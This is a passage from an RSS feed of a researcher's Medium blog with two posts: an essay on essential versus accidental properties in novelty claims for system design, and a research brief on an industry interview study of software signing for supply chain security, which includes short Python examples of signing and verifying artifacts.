this article helps improve your understanding of how to apply.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=160cb539ecab" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Essential vs. Accidental Arguments in Novelty Claims for System Design]]></title>
            <link>https://davisjam.medium.com/essential-vs-accidental-arguments-in-novelty-claims-for-system-design-cfcf37b46cdc?source=rss-5917da729916------2</link>
            <guid isPermaLink="false">https://medium.com/p/cfcf37b46cdc</guid>
            <category><![CDATA[software-engineering]]></category>
            <category><![CDATA[systems-engineering]]></category>
            <category><![CDATA[research]]></category>
            <dc:creator><![CDATA[James Davis]]></dc:creator>
            <pubDate>Tue, 15 Apr 2025 15:40:35 GMT</pubDate>
            <atom:updated>2025-05-12T14:09:21.590Z</atom:updated>
            <content:encoded><![CDATA[<p>(With credit to Saltzer et al.’s “<em>End-to-End Arguments in System Design</em>” for the title.)</p><p><em>Note: I originally wrote this post to coach students writing research papers. Efe Barlas pointed out that some of the thoughts also apply to system design analysis, e.g. design docs and design reviews. If you’re a practicing engineer, think about how these ideas might transfer to your design work.</em></p><p>In computing systems research and development, and I suppose in any discipline whose contributions consist of a new way of doing things, one must explain why the new way is a substantial innovation and improvement over the current one. One typically argues this by considering the requirements of the system, and showing that either (1) existing systems failed to satisfy known requirements; or that (2) there are new requirements for which the existing systems are unsuitable. In either event, one is faced with the following analysis task: <em>show through reason and through measurement why the old way of doing things is inadequate</em>.</p><p>I have had many conversations about system design, and I have read and peer-reviewed many research papers, and I have observed a common error in this analysis task. Here is the error: analysts often treat a prior work in terms of its embodiment instead of in terms of the underlying concept. When you describe the shortcomings of an embodiment there are a million things you can complain about — everything from the specific file formats that the prior work supports, to how slow it is, to anything in between. There is a lot of scope for criticism, but all such criticism is misplaced. Except in rare cases, the only legitimate target for critique is the <strong>conceptual underpinning</strong> of the prior work.</p><h4>Some philosophy</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_nhnh3PHI5LPRlXck4fVUw.png" /><figcaption>These chairs are both chairs in their essence, though they vary in the details. The table, meanwhile, is not a chair. Of course, all of these are symbols rather than the thing signified :-) Thanks <a href="https://en.wikipedia.org/wiki/The_Treachery_of_Images">Magritte</a>.</figcaption></figure><p>To criticize prior works in this way, I often invite my students to consider the <em>essential</em> versus <em>accidental</em> properties of the prior work. I am not a philosopher…well, I suppose PhD stands for “Doctor of Philosophy”, so perhaps I am? At any rate, I suppose possessing a PhD at least permits me to stray a bit into philosophy. I digress.</p><p>The notions of <a href="https://plato.stanford.edu/ENTRIES/essential-accidental/">essential and accidental properties</a> have been discussed for millennia. You can think of them as follows: an <em>essential property</em> is one that any embodiment of a concept (instantiation, reification, implementation) must have in order to be faithful to that concept. An <em>accidental property</em> is one that can be possessed by a particular embodiment of a concept but which is not universally true of all embodiments.</p><ul><li><em>For an example in everyday life</em>: A chair is something I can sit on. All chairs have at least one leg. These are essential properties of a chair. 
But not all chairs have four legs and not all chairs are made of wood; those are accidental properties, distinctive to specific chairs.</li><li><em>For an example in computing</em>: We talk in compilers about parsers, whose purpose is to check whether a given input follows a given structured format. Parsers are often used as part of rendering that input into an intermediate representation for further processing. Well, all parsers take input and check whether it meets a format — that’s their essential property. But the formats vary by parser! Not all parsers work on JSON; not all parsers work on XML; not all parsers work on CSVs. Criticizing a particular parser because it doesn’t support certain file formats is critiquing an accidental property of that parser rather than an essential one. Meanwhile, criticizing a parser because its computational complexity is too large, or because it cannot parse input formats with certain properties, is attacking an essential property of a parser (or a class of parsers, anyway). Changing those properties requires changing the parsing algorithm, a substantial change rather than a modest one. After the change, one could say it is indeed a different kind of parser now, that its essence has changed.</li></ul><p>I am reminded of the “<a href="https://en.wikipedia.org/wiki/Ship_of_Theseus">Ship of Theseus</a>” debate, where one considers whether, having replaced the oars, the deck, the rudder, the masts, the rigging, and all the other parts of a ship, it is indeed still the original ship. If you can replace all of those components with comparable equivalents, perhaps making the ship a bit faster or a bit easier to steer, and yet preserving the integral properties of the ship, I would say that you’re swapping in and out different <em>accidental properties</em> (different implementations of the same design). But if you make a crosscutting change, something that spans the whole system, that would take weeks or months or years of work rather than hours or days of work, then I would say you’re probably looking at an essential property of the system. By changing it, you’ve realized a conceptually different system. A cargo ship that’s 10% bigger is still a cargo ship; it’s not an aircraft carrier and it’s not a speed boat.</p><h4>Applying philosophy to make sound criticisms</h4><p>Now, what does this have to do with criticizing prior work? Here’s the bottom line: <strong>If you are criticizing prior work for an accidental property then your criticism is misplaced</strong>. If the property is really an accidental one, then just change the prior work — it’ll take a few days and then the problem goes away, much easier than spending 6 months to a year on your new system. Meanwhile, if you are criticizing prior work for an essential property, then all is well. By definition, there is no alternative implementation of the system you are criticizing that could possibly avoid that limitation. Thus you’re on firm ground to criticize it for that reason.</p><h4>Applying philosophy to write better papers (and system design docs)</h4><p>This notion of essential and accidental properties can also be applied to analyze one’s own system.</p><ol><li>First of all, if you are proposing a new system, you must make the effort to articulate the conceptual changes, not just the engineering ones. Research papers must describe new concepts, not just new engineering work; this is what reviewers mean when they say that a paper is just engineering (prior to rejecting it). 
Of course, any new concept must be operationalized in order to evaluate it, but the contribution of the paper is the ideas, not the implementation. Make sure that your paper points out the essential properties of your idea.</li><li>To complement this, when I describe the limitations of my systems, I like to divide the section into two parts. The first part describes the essential limitations, and the second the accidental limitations. I take the time to make sure my reader sees which shortcomings are “baked in”, and which could be changed with a bit of coding. I hope that such an analysis helps future readers avoid making this class of analysis error, and helps them see the directions I perceive for substantial improvements (read as: new papers) by distinguishing the conceptual vs. implementation choices in my work.</li></ol><h4>What about non-systems papers?</h4><p>I use this same kind of thinking when I write empirical software engineering papers. In such works, the convention is to write a Threats to Validity section which delineates threats into construct, internal, and external validity categories. The temptation is to enumerate all the ways in which your study might be biased, from the transcription system you used, to the projects you selected, through to what you ate for lunch that day. Of course, not all of these things are essential limitations of your work — some of them are accidental. Does it really matter which transcription service you use for your interview data? Does it really matter which survey software you used to collect survey data? No, I don’t think so. On the other hand, it matters quite a bit which software you selected for analysis, which demographic characteristics you controlled for in a sample, and which defects you chose to study. I always ask my students to describe the essential limitations of our work more than the accidental ones. Sometimes there are substantial “accidental” concerns that must be acknowledged, but we always start by describing what we perceive as the essential ones. Again, part of the goal is to help readers see where there is room for more research papers!</p><h4>Further reading</h4><ol><li>Stanford Encyclopedia of Philosophy entry on Essential vs Accidental Properties: <a href="https://plato.stanford.edu/ENTRIES/essential-accidental/">https://plato.stanford.edu/ENTRIES/essential-accidental/</a></li><li>Lamport’s advice to State The Problem Before The Solution helps me articulate the conceptual contribution prior to the embodiment: <a href="https://lamport.azurewebsites.net/pubs/state-the-problem.pdf">https://lamport.azurewebsites.net/pubs/state-the-problem.pdf</a></li></ol><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=cfcf37b46cdc" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[An Industry Interview Study of Software Signing for Supply Chain Security]]></title>
            <link>https://davisjam.medium.com/an-industry-interview-study-of-software-signing-for-supply-chain-security-8666d27539f8?source=rss-5917da729916------2</link>
            <guid isPermaLink="false">https://medium.com/p/8666d27539f8</guid>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[science]]></category>
            <category><![CDATA[software-development]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[software-engineering]]></category>
            <dc:creator><![CDATA[James Davis]]></dc:creator>
            <pubDate>Thu, 10 Apr 2025 01:48:10 GMT</pubDate>
            <atom:updated>2025-04-10T01:48:10.623Z</atom:updated>
            <content:encoded><![CDATA[<p>This is a brief for the research paper <em>“An Industry Interview Study of Software Signing for Supply Chain Security</em>”, published at the 2025 USENIX Security Symposium. This work was led by Kelechi Kalu. The full paper is available <a href="https://arxiv.org/pdf/2406.08198">here</a>. Kelechi Kalu wrote this brief, which I have lightly edited.</p><h3>Motivation</h3><p>Most cybersecurity-oriented folks have heard or read about the <a href="https://en.wikipedia.org/wiki/2020_United_States_federal_government_data_breach">SolarWinds attack</a> of 2020. SolarWinds affected many high-profile organizations, including the Department of Defense (DoD). This incident is often regarded as the poster child of software supply chain attacks. In response, new regulations (e.g., NIST guidelines and Executive Order 14028), security frameworks (e.g., SLSA, SSCIM), and academic proposals have emerged, all emphasizing the critical need for establishing software provenance through methods like software signing.</p><p>While these frameworks and regulations recommend signing, they do not provide concrete implementation models to guide adoption. In practice, <a href="https://davisjam.medium.com/signing-in-four-public-software-package-registries-quantity-quality-and-influencing-factors-7af4b416b6db">measurement studies</a> have shown that the software supply chain frequently suffers from missing or erroneous signatures, highlighting a gap between policy recommendations and real-world execution.</p><p>The effectiveness of software signing depends on careful adoption strategies. A deeper examination of current signing practices and the rationale behind them is essential for understanding its real-world implications. With that goal in mind, let’s get started.</p><h3>Key terms and definitions</h3><p>Before explaining our study, we’ll need some details about two key concepts — software supply chains and software signing.</p><h4>Software Supply Chains</h4><p>Software production is often visualized through a model that approximates the software engineering process, integrating both first- and third-party components, which are then packaged for downstream use. This combination of engineering processes and distribution forms the software supply chain, illustrated below.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/866/0*D1jdG17D8_1nFnG3" /><figcaption><strong>The software supply chain factory model visualizing the software supply chain.</strong></figcaption></figure><p>The security of the software supply chain is broadly defined by <a href="https://blog.stackademic.com/sok-analysis-of-software-supply-chain-security-by-establishing-secure-design-properties-6a0c897d5777">three key properties</a>:</p><ul><li><strong>Validity</strong> — Ensuring the integrity of components and actors.</li><li><strong>Transparency</strong> — Maintaining knowledge of components and actors.</li><li><strong>Separation</strong> — Isolating components and actions performed by different actors within the supply chain.</li></ul><p>The combination of validity and transparency establishes provenance — a crucial aspect of software security. Security techniques aim to enhance one or more of these properties to strengthen overall software supply chain security.</p><h4>Software Signing</h4><p>Software signing is a formally guaranteed method of establishing the authorship of software. 
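</p><p>Concretely, the signer computes a cryptographic hash of the software artifact and then encrypts (signs) that hash with a private key; anyone holding the matching public key can recompute the hash and confirm that the artifact is unmodified and was signed by the key holder. Here is a minimal sketch using Java’s built-in java.security API. It is illustrative only: production signing tools layer key distribution, identity, and revocation on top of this primitive.</p><pre>import java.nio.charset.StandardCharsets;
import java.security.*;

// A minimal sketch of sign-then-verify with Java's built-in crypto API.
public class SignDemo {
    public static void main(String[] args) throws Exception {
        byte[] artifact = "contents of a release artifact".getBytes(StandardCharsets.UTF_8);

        // The author keeps the private key; consumers get the public key.
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("RSA");
        kpg.initialize(2048);
        KeyPair keys = kpg.generateKeyPair();

        // Sign: hash the artifact (SHA-256) and encrypt the digest with the
        // private key.
        Signature signer = Signature.getInstance("SHA256withRSA");
        signer.initSign(keys.getPrivate());
        signer.update(artifact);
        byte[] signature = signer.sign();

        // Verify: recompute the digest and check it against the signature.
        Signature verifier = Signature.getInstance("SHA256withRSA");
        verifier.initVerify(keys.getPublic());
        verifier.update(artifact);
        System.out.println("signature valid? " + verifier.verify(signature));

        // Any tampering after signing breaks verification (Validity).
        artifact[0] ^= 1;
        Signature again = Signature.getInstance("SHA256withRSA");
        again.initVerify(keys.getPublic());
        again.update(artifact);
        System.out.println("tampered artifact valid? " + again.verify(signature));
    }
}</pre><p>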
This process supports two of the security properties given above:</p><ul><li><strong>Validity</strong> — The signed artifact has not been altered since it was last signed.</li><li><strong>Transparency</strong> — The contents of the artifact are verifiable.</li></ul><p>Together, these properties contribute to provenance, helping establish trust in the integrity and authorship of software components.</p><p>A more detailed discussion of the signing process is available in our prior work, <a href="https://davisjam.medium.com/signing-in-four-public-software-package-registries-quantity-quality-and-influencing-factors-7af4b416b6db">Signing in Four Public Software Package Registries: Quantity, Quality, and Influencing Factors</a>.</p><p>Empirical studies on software signing in open-source ecosystems have raised concerns regarding usability challenges, opportunities for exploitation, and low adoption rates. Our work takes a qualitative approach to exploring software signing practices in industry, aiming to answer key questions on effective signing strategies, adoption challenges, and the factors influencing its implementation.</p><h3>Methodology</h3><p>To investigate software signing adoption practices, we conducted 18 semi-structured interviews with experienced security practitioners from 13 organizations. Our participants were either responsible for initiating or implementing security controls within their organizations or worked in organizations that produced security products.</p><p>To develop our interview protocol, we drew insights from three key sources:</p><ol><li>Academic literature on software security and signing.</li><li>The software supply chain factory model to contextualize signing within broader supply chain processes.</li><li>Grey literature, including industry reports on software signing usage.</li></ol><p>By incorporating these diverse sources, we ensured that our questions were grounded in both theoretical understanding and real-world industry practices. Then, for data analysis, we employed a thematic and framework analysis approach to identify patterns and insights from participant responses. The figure below illustrates this:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/497/0*lche7RiAHTSOzNww" /><figcaption><strong>A summary of our study design and analysis process. We incorporated multiple sources to inform our study instrument design. Depending on the research question, we applied thematic analysis (inductive) or a combination of thematic and framework analysis (using the previously described software supply chain factory model).</strong></figcaption></figure><h3>Key Results</h3><p>We present some of the key findings from our research next. A more comprehensive set of results can be found in our accompanying paper.</p><h4>How is Signing Applied in Practice?</h4><p>We first examined where in the software engineering process software signing is implemented by development teams. To conduct this analysis, we used the software supply chain factory model (pictured above) as a reference framework. Based on participant responses, we modified the model to explicitly indicate the points in the software engineering process where provenance is — and should be! — established and verified. 
<p>Empirical studies on software signing in open-source ecosystems have raised concerns regarding usability challenges, opportunities for exploitation, and low adoption rates. Our work takes a qualitative approach to exploring software signing practices in industry, aiming to answer key questions on effective signing strategies, adoption challenges, and the factors influencing its implementation.</p><h3>Methodology</h3><p>To investigate software signing adoption practices, we conducted 18 semi-structured interviews with experienced security practitioners from 13 organizations. Our participants were either responsible for initiating or implementing security controls within their organizations or worked in organizations that produced security products.</p><p>To develop our interview protocol, we drew insights from three key sources:</p><ol><li>Academic literature on software security and signing.</li><li>The software supply chain factory model, to contextualize signing within broader supply chain processes.</li><li>Grey literature, including industry reports on software signing usage.</li></ol><p>By incorporating these diverse sources, we ensured that our questions were grounded in both theoretical understanding and real-world industry practices. For data analysis, we then employed thematic and framework analysis to identify patterns and insights in participant responses. The figure below illustrates this process:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/497/0*lche7RiAHTSOzNww" /><figcaption><strong>A summary of our study design and analysis process. We incorporated multiple sources to inform our study instrument design. Depending on the research question, we applied thematic analysis (inductive) or a combination of thematic and framework analysis (using the previously described software supply chain factory model).</strong></figcaption></figure><h3>Key Results</h3><p>We present some of the key findings from our research next. A more comprehensive set of results can be found in our accompanying paper.</p><h4>How is Signing Applied in Practice?</h4><p>We first examined where in the software engineering process software signing is implemented by development teams. To conduct this analysis, we used the software supply chain factory model (pictured above) as a reference framework. Based on participant responses, we modified the model to explicitly indicate the points in the software engineering process where provenance is — and should be! — established and verified. These points are summarized in the figure below.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/771/0*IWvo1DscU3O8WFFg" /><figcaption><strong>Our modified software supply chain factory model highlighting different expected signing use points. These points are categorized based on whether they involve producing (P) or verifying (V) signatures. We also indicate the number of participants, out of 18, who adopt signing at these stages. (PI — Internal contributors sign commits, VI — Verify signatures from internal contributors, PE — External contributors sign commits, VE — Verify signatures from external contributors, PS — Signing after code reviews/audits, VS — Verify source code signatures before build, PB — Signing of build output, VB — Verify build signature before deployment, PA — Signing of the final software product, VA — Verification by final customers, PD — Signing after verification and certification of dependencies, VD — Verify signatures from external dependencies.)</strong></figcaption></figure><p>From the figure, we observe that:</p><ol><li>Most teams establish software signatures at the final product phase, at the build phase, or after an internal source code review process (some even require signing from internal code contributors).</li><li>However, many teams omit signature verification (see the sketch below).</li></ol>
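<p>That second observation deserves emphasis, because an unverified signature provides no security benefit. To show how small the missing step is, here is a sketch of a fail-closed verification gate that a build or deployment pipeline could run before promoting an artifact. The file paths are hypothetical, and the RSA-PSS scheme simply matches the earlier sketch; this is an illustration, not a prescription from our study.</p><pre># Sketch of a fail-closed signature check before deployment. The paths
# and key format are illustrative assumptions.
import sys

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding


def verify_artifact(artifact_path, signature_path, pubkey_path):
    """Return True only if the artifact matches its detached signature."""
    with open(pubkey_path, "rb") as f:
        public_key = serialization.load_pem_public_key(f.read())
    with open(artifact_path, "rb") as f:
        artifact = f.read()
    with open(signature_path, "rb") as f:
        signature = f.read()
    try:
        public_key.verify(
            signature,
            artifact,
            padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                        salt_length=padding.PSS.MAX_LENGTH),
            hashes.SHA256(),
        )
        return True
    except InvalidSignature:
        return False


if __name__ == "__main__":
    # Hypothetical paths; in a real pipeline these come from configuration.
    if not verify_artifact("build.tar.gz", "build.tar.gz.sig",
                           "signer-public-key.pem"):
        sys.exit("Refusing to deploy: signature verification failed.")</pre><p>The important design choice here is failing closed: a missing or invalid signature stops the pipeline rather than merely logging a warning.</p>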
<h4>What are the Challenges of Software Signing Implementation?</h4><p>We asked subjects what challenges they experience as they implement signing. The following table summarizes what we learned.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*o6womBtU0cCEi2MU" /><figcaption>A summary of the challenges that our participants said affect their implementation of software signing. Using thematic analysis, we group these into Technical, Organizational, and Human challenges. While some of these issues have been noted before, we provide the first empirical investigation of them.</figcaption></figure><p>Verification problems were widely acknowledged by practitioners as a significant challenge. Our results also revealed subtle patterns indicating that participants from organizations of similar size or product focus reported similar types of issues. For example, <strong>only</strong> participants from large organizations reported difficulties in operationalizing the signing process, while <strong>only</strong> participants from organizations with non-security-focused product areas cited a lack of management incentives for adoption.</p><h4>How do factors such as security standards, regulations, and software supply chain incidents impact the adoption and implementation of software signing?</h4><p>We found that security failures primarily lead to direct fixes rather than large-scale security overhauls, with only a few instances prompting changes in software signing practices. Most incidents experienced by organizations were non-malicious vulnerabilities or operational failures rather than targeted attacks. When signing adoption was influenced, it was typically in response to specific security-critical needs, such as ensuring traceability in high-assurance environments.</p><p>Our results also show that while security regulations and frameworks shape broader security strategies — such as the adoption of SBOMs — they have minimal direct impact on software signing implementation. Organizations tend to comply with these regulations by enhancing general security processes rather than specifically integrating signing as a core security measure.</p><p>The following table gives a quantitative view of our data.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/722/0*5tNqqvjMx6_V1-fD" /><figcaption>Kinds of software supply chain failures experienced, and the associated security changes. Only one participant reported an influence of these failures on their software signing implementation. Software supply chain failures were more likely to prompt a direct fix than a change in the security process.</figcaption></figure><h3>Conclusions and next steps</h3><p>Our results show that while software signing is important, several challenges still limit its effective implementation. In its current state, software signing may not yet provide its full intended benefits. Our work addresses some of these challenges by refining the software supply chain factory model to clearly indicate where signing should be established and verified.</p><p>However, urgent issues in verification still need to be resolved, and security standards should emphasize the importance of software signing alongside SBOMs and other transparency techniques. Additionally, software signing tools should be designed for <strong><em>usability</em></strong>, making both signature creation and verification more accessible and efficient.</p><h4>What’s Next for Us?</h4><p>We are currently studying the usability of software signing tools, particularly Sigstore. We are also researching the state of software signature verification in open-source repositories. Breakthroughs in this area could contribute significantly to establishing trust in open-source ecosystems and improving overall security practices.</p><h4>Want to learn more?</h4><p>You can read the full paper <a href="https://arxiv.org/pdf/2406.08198">here</a>. Some of our related papers are <a href="https://arxiv.org/pdf/2407.03949">this one</a> and <a href="https://arxiv.org/pdf/2503.00271">that one</a> and also <a href="https://arxiv.org/pdf/2401.14635">that other one</a>. After the symposium in August 2025, our slides and recording will also be available on the USENIX website!</p>]]></content:encoded>
        </item>
    </channel>
</rss>